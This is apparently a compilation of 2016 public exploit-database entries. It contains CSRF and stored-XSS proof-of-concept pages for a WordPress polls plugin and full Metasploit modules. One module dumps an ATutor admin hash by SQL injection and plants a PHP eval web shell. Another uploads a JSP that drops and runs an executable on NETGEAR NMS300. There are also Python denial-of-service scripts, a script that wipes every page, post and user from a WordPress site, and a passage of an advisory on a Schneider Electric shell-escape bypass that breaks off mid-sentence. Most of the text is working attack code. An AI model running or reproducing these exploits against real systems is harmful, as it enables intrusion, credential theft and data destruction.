The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.
(copy of README.txt)
===================
Technical details
===================
CP Polls plugin for wordpress is vulnerable to Persistent Cross-site scripting is not sanitizing the
values of the options before savinng to database. This issue can be exploited by an attacker with
CSRF by sending a malicious link to a wordpress administrator. If administrator clicks the link, the
action will be executed because there isn't CSRF protection.
=========================
Proof of Concept (html)
=========================
<html>
<!-- CSRF PoC - Burp Suite i0 SecLab plugin -->
<!-- We can find the Poll id into the source code of a post with a cp poll and looking for ´CP_Polls_id´.
We can find something like: <input type="hidden" name="CP_Polls_id" value="4" />
4 is the Poll's id, now we have the id and we can make a csrf attack.
-->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:80/wordpress/wp-admin/options-general.php?page=CP_Polls&cal=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "CP_Polls_post_options=1&CP_Polls_id= [ Poll id to update! ]&poll_limit=2&poll_private_reports=false&poll_see_results=true&poll_text_seeres= [PERSISTENT CODE INJECT HERE] &poll_text_private=s&poll_text_votes=votes&fp_return_page=&form_structure=%5B%5B%7B%22form_identifier%22%3A%22%22%2C%22name%22%3A%22fieldname1%22%2C%22shortlabel%22%3A%22%22%2C%22index%22%3A0%2C%22ftype%22%3A%22fradio%22%2C%22userhelp%22%3A%22%22%2C%22userhelpTooltip%22%3Afalse%2C%22csslayout%22%3A%22%22%2C%22title%22%3A%22Select+a+Choice%22%2C%22layout%22%3A%22one_column%22%2C%22required%22%3Atrue%2C%22choiceSelected%22%3A%22%22%2C%22showDep%22%3Afalse%2C%22choices%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesVal%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesDep%22%3A%5B%5B%5D%2C%5B%5D%2C%5B%5D%5D%2C%22fBuild%22%3A%7B%7D%7D%5D%2C%5B%7B%22title%22%3A%22 [PERSISTENT CODE INJECT HERE] %22%2C%22description%22%3A%22 [PERSISTENT CODE INJECT HERE] %22%2C%22formlayout%22%3A%22top_aligned%22%2C%22formtemplate%22%3A%22%22%7D%5D%5D&vs_text_submitbtn= [PERSISTENT CODE INJECT HERE] &vs_text_previousbtn=Previous&vs_text_nextbtn=Next&vs_use_validation=true&vs_text_is_required=This+field+is+required.&cv_text_enter_valid_captcha= [PERSISTENT CODE INJECT HERE] .&vs_text_is_email=Please+enter+a+valid+email+address.&vs_text_datemmddyyyy=Please+enter+a+valid+date+with+this+format%28mm%2Fdd%2Fyyyy%29&vs_text_dateddmmyyyy=Please+enter+a+valid+date+with+this+format%28dd%2Fmm%2Fyyyy%29&vs_text_number=Please+enter+a+valid+number.&vs_text_digits=Please+enter+only+digits.&vs_text_max=Please+enter+a+value+less+than+or+equal+to+%7B0%7D.&vs_text_min=Please+enter+a+value+greater+than+or+equal+to+%7B0%7D.&fp_emailfrommethod=fixed&fp_from_email=admin%40localhost.com&fp_destination_emails=admin%40localhost.com&fp_subject=Contact+from+the+blog...&fp_inc_additional_info=true&fp_emailformat=text&fp_message=The+following+contact+message+has+been+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0A&cu_enable_copy_to_user=false&cu_subject=Confirmation%3A+Message+received...&cu_emailformat=text&cu_message=Thank+you+for+your+message.+We+will+reply+you+as+soon+as+possible.%0D%0A%0D%0AThis+is+a+copy+of+the+data+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0ABest+Regards.&cv_enable_captcha=false&cv_width=170&cv_height=60&cv_chars=5&cv_min_font_size=25&cv_max_font_size=35&cv_noise=200&cv_noise_length=4&cv_background=ffffff&cv_border=000000&cv_font=font-1.ttf&rep_enable=no&rep_days=1&rep_hour=0&rep_emails=&rep_subject=as&rep_emailformat=text&rep_message=Attached+you+will+find+the+data+from+the+form+submissions.&submit=Save+Changes";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
################################################################################
# Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
# Demo: https://www.youtube.com/watch?v=uc6P59BPEkU
===================
Technical details
===================
CP Polls plugin for wordpress is prone to file download issue. A hacker is able to attack an administrator by
exploiting a CSRF in the 'change cp poll name' converting the downloadable report file (csv) to a malicious .bat file.
Because there is not restriction in the cp poll name the CSRF exploit can change the name to ...
malicious.bat;
The semicolon (;) character must be restricted because the header 'Content-Disposition' uses this characteer as a
parameter delimitation. For example, when we change the name of a cp poll to 'malicious.bat;' when an administrator
download the report (thinking that is a csv file) the response header turns:
""
Content-Disposition: attachment; file=malicious.bat;.csv
""
the csv is ignored and the administrator gets a .BAT file
So, how to exploit this vulnerability to execute commands on the victim's machine?
Whe have an option. If the cp_poll is added in a post we can vote them and we can inject our malicious payload
into a votation.
==============================
Proof of Concept CSRF (html)
==============================
https://www.youtube.com/watch?v=uc6P59BPEkU
==========================
If the csrf attack is succesful, we only need to inject our commands in votations. In ´fieldnames´ post parameter
we can inject our commands.
################################################################################
# Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
===================
Technical details
===================
CP Polls plugin for wordpress is prone to persistent XSS via cross-site file upload.
When we register an cp_poll, it is sanitized correctly but when we upload a CSV file, we can
bypass the protection and inject malicious HTML/Javascript.
There are not CSRF protection in that action so it can be exploited with a CSRF attack by sending a
malicious link to a victim (administrator) a wait for execution of the malicious request.
=========================
Proof of Concept (html)
=========================
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>,
\"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
"-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
"\r\n" +
"Import\r\n" +
"-----------------------------17460754011784--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution',
'Description' => %q{
This module exploits a SQL Injection vulnerability and an authentication weakness
vulnerability in ATutor. This essentially means an attacker can bypass authenication
and reach the administrators interface where they can upload malcious code.
You are required to login to the target to reach the SQL Injection, however this
can be done as a student account and remote registration is enabled by default.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
],
'References' =>
[
[ 'CVE', '2016-2555' ],
[ 'URL', 'http://www.atutor.ca/' ] # Official Website
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Mar 1 2016',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
OptString.new('USERNAME', [true, 'The username to authenticate as']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
],self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def check
# the only way to test if the target is vuln
begin
test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
if test_injection(test_cookie)
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def create_zip_file
zip_file = Rex::Zip::Archive.new
@header = Rex::Text.rand_text_alpha_upper(4)
@payload_name = Rex::Text.rand_text_alpha_lower(4)
@plugin_name = Rex::Text.rand_text_alpha_lower(3)
path = "#{@plugin_name}/#{@payload_name}.php"
register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")
zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
zip_file.pack
end
def exec_code
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
})
end
def upload_shell(cookie)
post_data = Rex::MIME::Message.new
post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie,
'agent' => 'Mozilla'
})
if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla',
})
if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
'cookie' => cookie,
'agent' => 'Mozilla',
})
return true
end
end
# auth failed if we land here, bail
fail_with(Failure::Unknown, "Unable to upload php code")
return false
end
def get_hashed_password(token, password, bypass)
if bypass
return Rex::Text.sha1(password + token)
else
return Rex::Text.sha1(Rex::Text.sha1(password) + token)
end
end
def login(username, password, bypass)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "login.php"),
'agent' => 'Mozilla',
})
token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
if bypass
password = get_hashed_password(token, password, true)
else
password = get_hashed_password(token, password, false)
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_login' => username,
'submit' => 'Login'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
# this is what happens when no state is maintained by the http client
if res && res.code == 302
if res.redirection.to_s.include?('bounce.php?course=0')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
return cookie
end
else res.redirection.to_s.include?('admin/index.php')
# if we made it here, we are admin
return cookie
end
end
# auth failed if we land here, bail
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
return nil
end
def perform_request(sqli, cookie)
# the search requires a minimum of 3 chars
sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
rand_key = Rex::Text.rand_text_alpha(1)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
'vars_post' => {
"search_friends_#{rand_key}" => sqli,
'rand_key' => rand_key,
'search' => 'Search People'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
return res.body
end
def dump_the_hash(cookie)
extracted_hash = ""
sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i
for i in 1..login_and_hash_length
sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
asciival = generate_sql_and_test(false, false, sqli, cookie)
if asciival >= 0
extracted_hash << asciival.chr
end
end
return extracted_hash.split(":")
end
def get_ascii_value(sql, cookie)
lower = 0
upper = 126
while lower < upper
mid = (lower + upper) / 2
sqli = "#{sql}>#{mid}"
result = perform_request(sqli, cookie)
if result =~ /There are \d entries./
lower = mid + 1
else
upper = mid
end
end
if lower > 0 and lower < 126
value = lower
else
sqli = "#{sql}=#{lower}"
result = perform_request(sqli, cookie)
if result =~ /There are \d entries./
value = lower
end
end
return value
end
def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
if do_test
if do_true
result = perform_request("1=1", cookie)
if result =~ /There are \d entries./
return true
end
else not do_true
result = perform_request("1=2", cookie)
if not result =~ /There are \d entries./
return true
end
end
elsif not do_test and sql
return get_ascii_value(sql, cookie)
end
end
def test_injection(cookie)
if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie)
if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie)
return true
end
end
return false
end
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
private_data: opts[:password],
origin_type: :service,
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
last_attempted_at: Time.now
}.merge(service_data)
create_credential_login(login_data)
end
def exploit
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
print_status("Dumping username and password hash...")
# we got admin hash now
credz = dump_the_hash(student_cookie)
print_good("Got the #{credz[0]} hash: #{credz[1]} !")
if credz
admin_cookie = login(credz[0], credz[1], true)
print_status("Logged in as #{credz[0]}, uploading shell...")
# install a plugin
if upload_shell(admin_cookie)
print_good("Shell upload successful!")
# boom
exec_code
end
end
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
'Description' => %q{
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
The application has a file upload vulnerability that can be exploited by an
unauthenticated remote attacker to execute code as the SYSTEM user.
Two servlets are vulnerable, FileUploadController (located at
/lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
1.1.0.13.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-1525'],
['US-CERT-VU', '777024'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => true,
'Targets' =>
[
[ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 4 2016'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, "Application path", '/'])
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
'method' => 'GET'
})
if res && res.code == 405
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
end
def generate_jsp_payload
exe = generate_payload_exe
base64_exe = Rex::Text.encode_base64(exe)
payload_name = rand_text_alpha(rand(6)+3)
var_raw = 'a' + rand_text_alpha(rand(8) + 3)
var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
var_buf = 'c' + rand_text_alpha(rand(8) + 3)
var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
var_tmp = 'e' + rand_text_alpha(rand(8) + 3)
var_path = 'f' + rand_text_alpha(rand(8) + 3)
var_proc2 = 'e' + rand_text_alpha(rand(8) + 3)
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
} catch (Exception e) {
}
%>
|
jsp.gsub!(/[\n\t\r]/, '')
return jsp
end
def exploit
jsp_payload = generate_jsp_payload
jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
jsp_full_name = "null#{jsp_name}.jsp"
post_data = Rex::MIME::Message.new
post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
post_data.add_part(jsp_payload,
"application/octet-stream", 'binary',
"form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
data = post_data.to_s
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
print_status("#{peer} - Payload uploaded successfully")
else
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name),
'method' => 'GET'
})
handler
end
end
# Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow (DoS)
# Date: 21/01/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
# Software Link: http://www.tallsoft.com/tftpserver_setup.exe
# Version: 2.3
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-21: Vulnerability discovered
2016-01-24: Vendor contacted
2016-01-29: Vendor contacted again (no answer)
2016-03-01: Vulnerability published
Description :
-------------
A remote overflow exists in Quick Tftp Server Pro 2.3 in the TFTP mode when sending a TFTP Read Request. This allows to remotely crash
the application, thus causing a Denial of Service.
Instructions:
-------------
- Starts Quick Tftp Server Pro 2.3
- Run this exploit locally or from your remote attacking machine
"""
import socket
host = "192.168.135.132"
port = 69
request = "\x00\x01" # TFTP Read Request (RRQ)
file = "file.txt"
mode = '\x41' * 1024 # Overflow
buffer = request + file + "\x00" + mode + "\x00"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "[*] Sending buffer to %s (%d bytes)..." % (host, len(buffer))
s.sendto(buffer, (host, port))
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
# Exploit Title: Freeproxy Internet Suite 4.10 Remote DoS
# Date: 01/03/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.handcraftedsoftware.org/
# Software Link: http://www.handcraftedsoftware.org/index.php?page=download&op=getFile&id=2&title=FreeProxy-Internet-Suite
# Version: 4.10.1751
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-29: Vulnerability discovered
2016-01-30: Vendor contacted
2016-03-01: Vulnerability published
Description :
-------------
A remote Denial Of Service exists in Freeproxy Internet Suite 4.10.1751 when sending a GET request to the proxy with an overly long URL.
Instructions:
-------------
- Starts Freeproxy Internet Suite
- Run this exploit locally or from your remote attacking machine. Multiple sends may be necessary to crash the application.
"""
import socket
host = "192.168.135.132"
port = 8080
junk = '\x41' * 5000
buffer = "GET http://::../%s/index.html HTTP/1.1\r\n" % junk
buffer += "Host: www.google.fr\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer += "\r\n\r\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending buffer %d bytes..." % len(junk)
s.connect((host, port))
s.send(buffer)
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
# Exploit Title: PictureTrail Photo Editor GE.exe 2.00 - ./bmp Crash PoC
# Date: 01-03-2016
# Exploit Author: redknight99
# Vendor Homepage: http://www.picturetrail.com/
# Software Link: http://www.picturetrail.com/downloads/photoeditor200.exe
# Version: 2.0.0
# Tested on: Windows 7, 10
# CVE : Unknown
Picture Trail Photo editor fails to properly parse .bmp header height and width values.
Negative height and width values cause a program crash (memory corruption) and SEH corruption. Remote code execution may be possible.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39518.zip
Source: https://github.com/Cr4sh/secretnet_expl
Secret Net 7 and Secret Net Studio 8 local privileges escalation exploit.
0day vulnerabilities in sncc0.sys kernel driver of Secrity Code products allows attacker to perform local privileges escalation from Guest to Local System. Also, attacker that has access to any Windows system may manually install sncc0.sys (that has valid digital signature from Security Code) and exploit it's vulnerability to bypass DSE and load unsigned kernel mode drivers on Windows x64 platforms.
For detailed vulnerability analysis and explanation of how sncc0_00220010_expl code works please read Windows DSE bypass part of my article "Exploiting SMM callout vulnerabilities in Lenovo firmware".
This exploit was tested with 64-bit versions of Windows 7, 8, 8.1 and 10. On SMEP enabled systems you have to manually restore original value of CR4 register to avoid PatchGuard bugchecks, for real life usage example please check my fwexpl project.
Proof of Concept:
https://github.com/Cr4sh/secretnet_expl/archive/master.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39520.zip
'''
* Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation]
* Discovery Date: 2016-02-10
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://bulkwp.com/
* Software Link: https://wordpress.org/plugins/bulk-delete/
* Version: 5.5.3
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Bulk Delete_ plugin for WordPress suffers from a privilege escalation
vulnerability. Any registered user can exploit the lack of capabilities
checks to perform all administrative tasks provided by the _Bulk Delete_
plugin. Some of these actions, but not all, are:
- `bd_delete_pages_by_status`: deletes all pages by status
- `bd_delete_posts_by_post_type`: deletes all posts by type
- `bd_delete_users_by_meta`: delete all users with a specific pair of
meta name, meta value
Nearly all actions registered by this plugin can be performed from any
user, as long as they passed to a query var named `bd_action` and the
user has a valid account. These actions would normally require
administrative wrights, so we can consider this as a privilege
escalation vulnerability.
PoC
---
The following script will delete all pages, posts and users from the
infected website.
'''
#!/usr/bin/python3
################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import requests
loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
l = requests.post(loginUrl, data=loginPostData)
if l.status_code != 200 or len(l.history) == 0 or
len(l.history[0].cookies) == 0:
print("Couldn't acquire a valid session")
exit(1)
loggedInCookies = l.history[0].cookies
def do_action(action, data):
try:
requests.post(
adminUrl + '?bd_action=' + action,
data=data,
cookies=loggedInCookies,
timeout=30
)
except TimeoutError:
print('Action ' + action + ' timed out')
else:
print('Action ' + action + ' performed')
print('Deleting all pages')
do_action(
'delete_pages_by_status',
{
'smbd_pages_force_delete': 'true',
'smbd_published_pages': 'published_pages',
'smbd_draft_pages': 'draft_pages',
'smbd_pending_pages': 'pending_pages',
'smbd_future_pages': 'future_pages',
'smbd_private_pages': 'private_pages',
}
)
print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
'post',
'page',
'attachment',
'revision',
'nav_menu_item'
]})
print('Deleting all users')
do_action(
'delete_users_by_meta',
{
'smbd_u_meta_key': 'nickname',
'smbd_u_meta_compare': 'LIKE',
'smbd_u_meta_value': '',
}
)
exit(0)
'''
Solution
--------
Upgrade to v5.5.4
Timeline
--------
1. **2016-02-10**: Requested CVE ID
2. **2016-02-10**: Vendor notified through wordpress.org support forums
3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
4. **2016-02-10**: Vendor responded and received details about the issue
5. **2016-02-10**: Vendor verified vulnerability
6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue
'''
*# Exploit Title: [*Schneider Electric SBO / AS Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.schneider-electric.com*] *
*# Versions Reported: [*
Automation Server Series (AS, AS-P), v1.7 and prior
*] *
# CVE-ID: [CVE-2016-2278]
About
Schneider Electric’s corporate headquarters is located in Paris, France,
and it maintains offices in more than 100 countries worldwide.
The affected product, Automation Server, is a building automation system
for small and medium-sized buildings. According to Schneider Electric,
Automation Server is deployed in the Commercial Facilities sector.
Schneider Electric estimates that this product is used worldwide.
*Vulnerabilities*
*1. Weak credential management*
CVE-ID: None [ Mitre, CVE? ]
There are two primary users:
a. root - password is not set by default - this is a problem as we will see
later in the vuln findings
- By default, root cannot SSH in.
b. admin - default password is 'admin'
- Anyone can remotely ssh in to the device using default admin/admin login.
The system / application allows a) weak creds to start with, and more
importantly, b) vulnerable versions lacks the mechanism to forcefully have
the user change the initial password on first use or later. This has been
fixed in the latest version.
*2. OS Command Injection*
*CVE-ID*: CVE-2016-2278
*https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
<https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01>*
After logging in to the device over SSH, the 'admin' user - the only
active, administrative user at this point - is provided a restricted shell
(msh), which offers a small set of, application- specific functional
options.
$ ssh <IP> -l admin
Password:
Welcome! (use 'help' to list commands)
admin@box:>
admin@box:> *release*
NAME=SE2Linux
ID=se2linux
PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
VERSION_ID=0.2.0.212
admin@box:>
admin@box:> help
usage: help [command]
Type 'help [command]' for help on a specific command.
Available commands:
exit - exit this session
ps - report a snapshot of the current processes readlog - read log files
reboot - reboot the system
setip - configure the network interface
setlog - configure the logging
setsnmp - configure the snmp service
setsecurity - configure the security
settime - configure the system time
top - display Linux tasks
uptime - tell how long the system has been running release - tell the os
release details
Attempting to run any different command will give an error message.
However, this restricted shell functionality (msh) can be bypassed to
execute underlying system commands, by appending '| <command>' to any of
the above set of commands:
